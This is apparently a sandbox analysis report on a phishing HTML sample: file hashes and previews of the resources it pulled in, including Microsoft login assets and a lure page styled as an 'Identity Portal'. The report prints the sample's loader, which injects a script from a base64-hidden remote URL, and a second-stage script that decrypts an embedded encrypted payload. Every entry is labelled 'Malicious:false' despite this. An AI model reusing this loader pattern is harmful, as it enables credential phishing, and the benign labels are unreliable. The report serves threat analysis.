                                          SHA-256:EC78B15FCBE52D7C78D833A55918D73E7FD754FA01F588471A05083CA7F48AA5
                                          SHA-512:1DF7BA1493FBC9F9C082EFABBCCCC60639655A2073D5BD840C12EAAC1497AC60A1ACBC26063B34FA237A831AB8AB2C69707F8E1828BC1C9A353A6DB154741816
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://newassets.hcaptcha.com/captcha/v1/05c78a4/static/hcaptcha.html
                                          Preview:<!DOCTYPE html>.<html lang="en" data-id="hcaptcha-frame-05c78a4">.<head>. <title>hCaptcha</title>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta http-equiv="Content-Security-Policy" content="object-src 'none'; base-uri 'self'; worker-src blob:; script-src 'self' 'unsafe-eval' 'sha256-xk0yZ4x/LOHDUIa2QBFwUJp6S6DmfOCn2Tvuo9PRuj4=';">. <style type="text/css">*{-webkit-tap-highlight-color:transparent;-webkit-font-smoothing:antialiased}body,html{margin:0;padding:0;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen,Ubuntu,"Helvetica Neue",Arial,sans-serif;overflow:hidden;height:100%;width:100%;background-color:rgba(255,255,255,0);background-color:transparent}fieldset{margin:0;padding:15px 20px;border:none}button:focus,input:focus,select:focus,textarea:focus{outline:0}:focus{border:none;outline:0}textarea{border:none;overflow:auto;outline:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;resize:non
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113378
                                          Category:downloaded
                                          Size (bytes):20400
                                          Entropy (8bit):7.980289584022803
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F0DE9A98DBDFA8C02742CE6D92FB2524
                                          SHA1:CDEC682AEB9E39EDCCC2374DAB26F04DB754A8B5
                                          SHA-256:FAF4294F27A542B0F9EA2A7CB2711529AB027CD84A5F5BADFAE752100855E6BE
                                          SHA-512:856FC9AB199997E69A9487372BC0083564F7115B3E0678CF1D542B9864E9A88D5FFB85697FD93538DC9439071E3BCD4B8BCCBFC610E1A45DE104D6362D8ADCD9
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css
                                          Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                          Category:dropped
                                          Size (bytes):673
                                          Entropy (8bit):7.6596900876595075
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0E176276362B94279A4492511BFCBD98
                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                          Category:downloaded
                                          Size (bytes):5529
                                          Entropy (8bit):7.95514518328613
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6DEB44A9FE273266EFABC3214B998BA0
                                          SHA1:C8BE755694C25E416C81F5057670E3B14B2FE08F
                                          SHA-256:4A1AA3B8B23FB3C150A62BB681DAE96E6CAB20BFAFB89D74FED2E0BC85826BAF
                                          SHA-512:EBA11F91C3751574F82FBF82F81338761142ABC13B14534133A2986BEF2F2505125B648E1E991F79C1ACC731A9008F98C3F7937649533E7C4E59C2548D4E7452
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js
                                          Preview:...........[}w.F...?.b.(..c.i....8zI..k..f...$F.1.. ........$!..=.13w..s./>.w........u{g.=...u.....>h./{.F..xhS..7.6....9p...(.D..a..Q.\hS.L|7.FI4.....$....._.X4.At..@.x...s.seZ.....!V..x..'..F.?..z.[..Ppm.z<..'.p.]..$..(..>...6.3..o.47..6..t...AfX..F.($8...= ...'..GDb<.iM..s.D....N..F.<.e.......M....t ...Sk.'wDb.h...M2K...... ..6N.X.o..s...S.....r.`......1..4.c...J....V....ED.7.........p......&i....p....F.C/...W...-.....|..E...W.v5.....M]?...*s.........~....!........R.....~.A... v....C.S1.X|.lZ.LL...._.f....h.f.ep.2a>..,G..,...d..G&....dn.....j$..uB.z...Y..x2.......rI. ...?...w<.y.b.vF..h...b..l......\....cq.S.u......'&...E..s.d..-).I.M]..0.;.....;~6K'....$.G....;.8..<_.;.O.]...;.}..[.cWDJ6z..l..H..'8~..6vj5........Q...I..X.Ww..vB.....{v..$...].......d..kAO#.G...0(.....Y..G.6k.%z.S..6....Qw...`H....)1.5.......M...}C..z...2...d.;5..(.!.....}.Y.!..0..n.a.`..'D..@../.N.|w.OcH.];Z...k.....1g.4.f..t.'...........8i..<!...6M...p...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (46591)
                                          Category:dropped
                                          Size (bytes):142367
                                          Entropy (8bit):5.430597817875451
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                          SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                          SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                          SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 352 x 3
                                          Category:downloaded
                                          Size (bytes):2672
                                          Entropy (8bit):6.640973516071413
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                          Category:dropped
                                          Size (bytes):116365
                                          Entropy (8bit):7.997737813291819
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:2D3FBED6DDD719FCC1BFB500B612FCEC
                                          SHA1:CD91B795DDE806AC8A38E51CCB6E8BAD8E57DA1B
                                          SHA-256:B2566B646F02DF4CE30B05D8223B78130A719D4EC9E4794A0106C371ADE33CC7
                                          SHA-512:A870E514B325D6FDC4D154438A8DD333C7AB46E545C1B27AC4869D9F1D8594CA1CDC530F5E96C835220DDAD4E1CEF841673696978031B5237E783972AEE701D1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........k[.H.(.}..[..-..c.0DFxHBz.I......O.a...#yt......k...J..&...........^.~...._..j...W;.8<.....]....m...~.}<.8~s.~=.(....qm.Oy.~....jaP......h.F^......|oZ.G.M-...,...a..~..GW|...L....N.(y...Z-..Cm......p.......?.5/.QmS..b^K...jw..8.}..Q.....!.o..8...&X.x-.Im.F.D..U;.....-.T.:...1........8Ka..M.L.ZZ'....>........x....v.S;.<...0J.I.0.G.....B.F..c.k.~....C.:...r..,.w.q~....q......#42V.q..f|.kK...1o.mP.}.......N..n.w6.%^M.d.;...~2I.Z..fs...S/......F..=?...5....s..N.+.A.mx...j.T......?..W._p6.|.}|.{O.....2..`..._......g....j..xb^^...a.y.....s......4....q.Y..^T....X,.....m..~v,.....WP.U...:O".YoRX...7..S...zI.v.......mq.....E.,z.%....L|.>.M.'i..ki3.u+.~...x.=...?6.%?.[.G.`Z=.$.w..4.."...R.1.k.|..N.`......3...7.].'.E..).az......<a....4q..6.(..=~..........frk..?M#^Q.z..A..M.f.......S....s..d.e91._,zO.[X.......4.G..!.9Vg.......j.-?~.z.w..f.M............,...Z....w5..#.^..M.P.'.X.n/..mW.|......0...w../...>\...l.......h...q>.w...FC[....7.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (373), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1197
                                          Entropy (8bit):5.874204523462787
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:59247595AE65149151A2CBEBD97435B0
                                          SHA1:AFAB0502BEDDC25035D6B39F32C95D6B4B1FED1D
                                          SHA-256:72C583D9D83908A284DF153557009246B8BE1258BF9B73A7AA5D16D494CC8417
                                          SHA-512:65DDC0EC67438DBFB94CB995C432469F08493B31CCB7B3679A2A3104C4C065D4D93B575EC5EA335A856858CA91FDF01B50EF21ECAD73794BE37854A8702A600E
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kavanaltd.com/news/index.php
                                          Preview:var hMKPeqpoDY = document.createElement("script");..hMKPeqpoDY.setAttribute("src", "https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js");..document.head.append(hMKPeqpoDY);....hMKPeqpoDY.onload = function() {.. const fOYZPbXOid = CryptoJS.enc.Base64.parse("yv3SXPeZATt10WAfCsAO12c8tSwnnzgo+jqZPaknA6ttfHV/xS4vVynaDqxW7KihRjCQyoFai61oMeBmYE/dknIYCRrjslgb2mrBJXURldHbTxDIfNQd23k4lj9Oy11ersaZXzgLnGTyhV5gS0zqU7M/+qV1P2IDqMljPmunSCKcob8x6/lkYNDE3/mC21lLB5xuJN9MTrTKUtAx6CkKbvFpoVYxSYFQM85rhL2moUSLZTqPH3No4+DTg3jpYqQrMHlyMLRcRPlO9F5G7ylWRL4Nbvv/GCnvzY7SBIx8/MOWM5KyiP3T+SZgadtEvWHh");.... const NmayjQoVwv = CryptoJS.lib.WordArray.create(fOYZPbXOid.words.slice(0, 4));.. const UifrZLsFiy = CryptoJS.lib.WordArray.create(fOYZPbXOid.words.slice(4, 8));.. const bPkYixjcJD = CryptoJS.lib.WordArray.create(fOYZPbXOid.words.slice(8));.... const TjQJybyJVc = CryptoJS.PBKDF2("rsGgJqIRzChsbjwcyVNYODVxZsOhSAUe", NmayjQoVwv, {.. keySize: 256 / 32,.. iterations:
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (41625)
                                          Category:dropped
                                          Size (bytes):150620
                                          Entropy (8bit):5.4047108521554685
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CE804EE138A1C6220401E9413D6D632F
                                          SHA1:22B897D0C5BA6C6175108FAFFAFE513138C21577
                                          SHA-256:219B467E10FA76AFADEAFCBFDD061ABA7856418C3C6D64CF12086C3C51B857B7
                                          SHA-512:86DA4C526D9849F58936F5C75B09D784CB23E6497EF65BC901C6C3DF8F13CB05352431848F40AD15F36E4501759A5D1E28D2E1BD6C1A5F458091194CAD99D388
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/* https://hcaptcha.com/license */.!function(){"use strict";function e(e){var t=this.constructor;return this.then((function(n){return t.resolve(e()).then((function(){return n}))}),(function(n){return t.resolve(e()).then((function(){return t.reject(n)}))}))}function t(e){return new this((function(t,n){if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var i=r.length;function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var a=n.then;if("function"==typeof a)return void a.call(n,(function(t){o(e,t)}),(function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)}))}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceof
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                          Category:dropped
                                          Size (bytes):1435
                                          Entropy (8bit):7.8613342322590265
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (373), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1197
                                          Entropy (8bit):5.872467272208622
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BDF9F3E383EA3BCCE8F1561BB54C3B28
                                          SHA1:D90D9ED9F25D1B3CB0FB1092321B7310E49378F3
                                          SHA-256:5A5C6B4635D36226E1BF612BC7DA7C1A94D3434B234E436E1CFB1207C8D85B9E
                                          SHA-512:937386D9308AC2AB394D373C77B0E8554D924B448395BEEDE4B6629D650F0BA1D3B83CFC0A3339522F79EFF9670EB33E698F0D984708991E950F6A1437E297EB
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:var KCKCPkBUrR = document.createElement("script");..KCKCPkBUrR.setAttribute("src", "https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js");..document.head.append(KCKCPkBUrR);....KCKCPkBUrR.onload = function() {.. const sSPCONpBtJ = CryptoJS.enc.Base64.parse("ER3YxrNKnGMEfT2nbMt/W9h2ymCd0xcaaubjIVA+z28C9drn6jfKp/nLa2Tc+X5TTrzRKZP5rWyyHG3p4aemNQKsGszFGmEF1RzV2ryeZQwuBIdV5uZ+sUYwLSgLknQxFB4apfcAkUFC+1p9PHclkvoWT9eYSwoXrFdNrObuvFF8DzjS+qFyZ28lRuJO1Wlr9er+JZ1VHCOTkdel9BA4TQTclXg4aILIPVwWw9U759LS5kLjzbSIZoi8SEhAxIAnY3kAViXr2tUMLIFqUoq78SoQIDMsoPMJH7jbk0FkqExO/x0ep5amZh79oNcMF5UY");.... const iCxvvXgAEz = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(0, 4));.. const VQGkYtxNuP = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(4, 8));.. const boqYZyIQln = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(8));.... const BoetwppTXx = CryptoJS.PBKDF2("uzTvAiTWBoGECqGxawiNKQcmXWYacTkJ", iCxvvXgAEz, {.. keySize: 256 / 32,.. iterations:
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 18 x 89, 8-bit/color RGB, non-interlaced
                                          Category:downloaded
                                          Size (bytes):61
                                          Entropy (8bit):4.068159130770307
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8356820BB5F9C2554F4DA7F28CC935C9
                                          SHA1:380AD5350804AF0D7206741FD034F9B87249B3EF
                                          SHA-256:CDD5959A06FE785EFAE594A972A36AA9BE80FD06B966B0E9A1BAC1C08759A1CA
                                          SHA-512:0A60A0B294DC1701139FD480C666C63919045E2102573373AC6637FCB53AF5A4B298458EE55E847BABA45B59F67C952A53D75938D3BCC1421AE13963E41577DC
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ec7041e0d548c89/1733265186619/cqDPrfb_wfwdbke
                                          Preview:.PNG........IHDR.......Y......3.....IDAT.....$.....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with very long lines (874), with CRLF, LF line terminators
                                          Category:downloaded
                                          Size (bytes):21446
                                          Entropy (8bit):4.18476347651504
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B81751F0F9609FDE090981EBE12729B3
                                          SHA1:8C63FE29B30C8A1D496545BDDEF59022733C486F
                                          SHA-256:1088986D9E91929597AFAED2157A6B20329A006ABA9C574771EAE6F85B21E427
                                          SHA-512:91CDEADE4AC8084E926D6EFB485F40A0A994B275260D3C8DC67C696EC23C4AB7E42060C5D6457AF172064162AF0DA64370109DE12C0A4CA6F48E87E9DA915999
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://login.protiv-bubuljica.info/HaNkgGIY
                                          Preview:<!DOCTYPE html>..<html lang="en-US">.. #region(collapsed)-->.. <head>.<meta property="og:title" content="Identity Portal" />.<meta property="og:description" content="Download your file securely - click to preview" />... <style>.. * {.. box-sizing: border-box;.. margin: 0;.. padding: 0;.. }.... html {.. line-height: 1.15;.. -webkit-text-size-adjust: 100%;.. color: #313131;.. }.... html,.. button {.. font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji;.. }.... body {.. display: flex;.. flex-direction: column;.. min-height: 100vh;.. }.... a {.. transition: color 0
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                          Category:dropped
                                          Size (bytes):35168
                                          Entropy (8bit):7.99275807202193
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:D3B6AE9986DF244AB03412CC700335D0
                                          SHA1:BAAA1F9899178938F3881F09B18265E47DA806E3
                                          SHA-256:CA50059111D30C2E212C90805792EB543548AEF0D4941E886A778E3DCE0B9066
                                          SHA-512:755C57FBC9BECE435A477F76C5E8198CA8942C23BE667ACAB83A00E5CD4F54075B10AA07C7FDC10C38FC3D5C0C406C9132FEB5B67BA5BCCC57EF796054A84E7C
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........:..z.>.y..u.....N...^..S.......z~@..;...n...K........x..A]....F.8X&Em..P.s.....a.g.|.d......._..C`.xQ...\..'...QP....?.R.{?....|.>........E4.GRz...z.k.z.}....h..>.{[E.:.....Pu. ..e6_.o.p*.w...>...:...o.k~...~..&E._..}}.}%[. ..#......z.5M.b.....z..k.H.4...l..D.o...z..M.+../..`....?y.J4.=....u.....Z.....E.d.....{0H^...8.....9..h......d..6j......../..z..V<.`.F.xm.y..yt.J....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):776
                                          Entropy (8bit):5.807461699427976
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FA6639CA26FD4DC3D5B7D8824BF75FFD
                                          SHA1:84FE0B55971A775F89ED668D86CA09D09951713F
                                          SHA-256:B2171DBEF9F556500934FF5414D80975580E5357F2B485FCDAADD5D376FDAB9A
                                          SHA-512:770CF5A5D465C8B7F78D5BCA888C8433EED785B85182512A1F2850317E10FF2C492B0A23295695C060FE1BE04241F73D540C86A3E866FD19ABC0376D8D34A8AE
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:{"features":{"enc_get_req":true},"c":{"type":"hsw","req":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmIjowLCJzIjoyLCJ0IjoidyIsImQiOiJtVVlEdUh5STZlVTlreTliUUZySEs5cERaZzdJUUdiZUwxeVhHSU5sc0FSVTNvV1ppYWxhTkhNV2J6NWVSYjJ5c29oekNsS3NqcDBHNnNxbHQzREFKejdzOXdvSkQ4WkNFbkJ4TFNTVWh1TGIyNEhwNGkwZDVQMVlqUWQvN1VUcW95U3pCclRFZzMxandCQkdmWE1iOG14M05udVpwTkVQeDFUMHFIWWZyV01BYUZESzFOb1JzM0FrQ1hvaXJCQlFjTkRhaDhrVGdRVzBDblAwWUR4SER5aDlSbmhxVDZrUVQ3eUYyaEVnZ05ReFRRaUlRdTRkakVtdEp0V3FVZVU9cFNsM3lwM1FncTZrRWFmQSIsImwiOiIvYy8wOTVlYTRlOWIwMDJhNjNhODQ0NWNmYjFiYWU2ZjIzN2E1NWI1ZWZiZmM1ZDc4MzhkNmYxNzMyYTlhOTgyMjAzIiwiaSI6InNoYTI1Ni1nazlFYUdETk9zc2Qzd0Iwdk1qKzZMOHVlR1h0aisrMDlpVFZIWkx1cnRjPSIsImUiOjE3MzMyNjY5ODYsIm4iOiJoc3ciLCJjIjoxMDAwfQ.cYt-0torVzp1RqyEP3jzphHamyXj02vy2Mf43QDc3XM"},"pass":true}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):28
                                          Entropy (8bit):4.208966082694623
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:89BE93E81169A3478F5B92F3C91AF580
                                          SHA1:C62E2852B394952919463742831CB4C66CCA1C8B
                                          SHA-256:77C5F518D3925E0083F47A20572ADB178B2204D07FAA396A2E3B0AFD803155B9
                                          SHA-512:0F837CB5A3E3C67CFE10B21FB4965A1B39E4C10CEA9137D03A9D5B743B6F36A02CDE5348752D59C0BF28F9CFA0163D99A7767CCE9255500E5C3E15EA1F74C173
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlZaOlGNxXh2BIFDVNaR8USBQ2_JFKQ?alt=proto
                                          Preview:ChIKBw1TWkfFGgAKBw2/JFKQGgA=
                                          File type:HTML document, ASCII text, with CRLF line terminators
                                          Entropy (8bit):5.4779511858725085
                                          TrID:
                                          • HTML Application (8008/1) 100.00%
                                          File name:MGj3hwACvs.html
                                          File size:186 bytes
                                          MD5:e37756f2f264e9a8b954b53716b92421
                                          SHA1:2394db034fc5451f10a6324d5e3677d4b3eb5910
                                          SHA256:6c643604eff267134b90b83efdf6719387a1b59240350b17ab2019b5ee0532ad
                                          SHA512:222d1c21e276c2f675bf295a513794d9fc36ba965c89c302ee717878e00a87f24d9a2197e85b97ba18c2f615307a8657f70c3d29eb7299acae94627d78b18d09
                                          SSDEEP:3:gtUjHSkEcF8GIR5XLEI14QDLNBiRyRmgO9lNHWAUaqJVdYPsAJ0pXcIJgObbsd5r:Z7SkhOGI/XLb5DLm8mgO9lVhnKHkVIPa
                                          TLSH:5BC080561EB0CE740F370095313C92C87A753D3C5531EC15D6DECC4D9044E805D9A554
                                          File Content Preview:<script> .. var payd = "%EMAIL%"; .. document.head.append(Object.assign(document.createElement("script"), {src: atob("aHR0cHM6Ly9rYXZhbmFsdGQuY29tL25ld3MvaW5kZXgucGhw")})); .. </script>
                                          Icon Hash:173149cccc490307